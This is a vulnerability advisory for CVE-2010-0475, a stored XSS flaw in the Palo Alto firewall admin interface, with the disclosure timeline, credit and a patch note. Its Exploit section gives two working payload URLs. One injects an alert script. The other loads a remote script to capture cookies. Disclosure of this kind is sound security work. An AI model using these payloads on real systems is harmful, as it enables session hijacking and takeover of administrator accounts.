Class: Cross-Site Scripting (XSS) Vulnerability CVE: CVE-2010-0475 Remote: Yes Local: Yes Published: May 11, 2010 08:30AM Timeline:Submission to MITRE: 1/18/2010 Vendor Contact: 2/18/2010 Vendor Response: 2/18/2010 Patch Available: 5/2010 Patched in maintenance releases (3.1.1 & 3.0.9) Credit: Jeromie Jackson CISSP, CISM COBIT & ITIL Certified President- San Diego Open Web Application Security Project (OWASP) Vice President- San Diego Information Audit & Control Association (ISACA) SANS Mentor LinkedIn: www.linkedin.com/in/securityassessment Blog: www.JeromieJackson.com Twitter: www.twitter.com/Security_Sifu Validated Vulnerable: Latest Version Per December 31, 2009 Discussion: A Stored Cross-Site Scripting (XSS) vulnerability was found within the Palo Alto interface. By crafting a URL that includes XSS code it is possible to inject malicious data, redirect the user to a bogus replica of the real website, or other nefarious activity. Exploit: Single Line working- https://10.32.5.223:443/esp/editUser.esp?mode=edit&origusername=test&deviceC=localhost.localdomain&vsysC=localhost.localdomain%2Fvsys1&vsys=&profile=&cfgchange=&opasswd=&tpasswd=********&cpasswd=********&role=vsysadmin<SCRIPT>alert("0wn3d")</SCRIPT> &admin-role=%5Bobject+Object%5D&bSubmit=O WORKING FOR REDIRECT TO LOAD cookies into URL. https://10.32.5.223:443/esp/editUser.esp?mode=edit&origusername=test&deviceC=localhost.localdomain&vsysC=localhost.localdomain%2Fvsys1&vsys=&profile=&cfgchange=&opasswd=&tpasswd=********&cpasswd=********&role=vsysadmin<SCRIPT/XSS SRC="http://www.jeromiejackson.com/tryme.js"></SCRIPT>&admin-role=%5Bobject+Object%5D&bSubmit=O Solution: A patch will be required from the vendor. It is recommended a routine to sanitize user input be consistently implemented throughout the application to mitigate other such occurrences within the application. References: OWASP Cross-Site Scripting (XSS) Attack Discussion Rsnake's Cross-Site Scripting (XSS) Attack Cheat sheet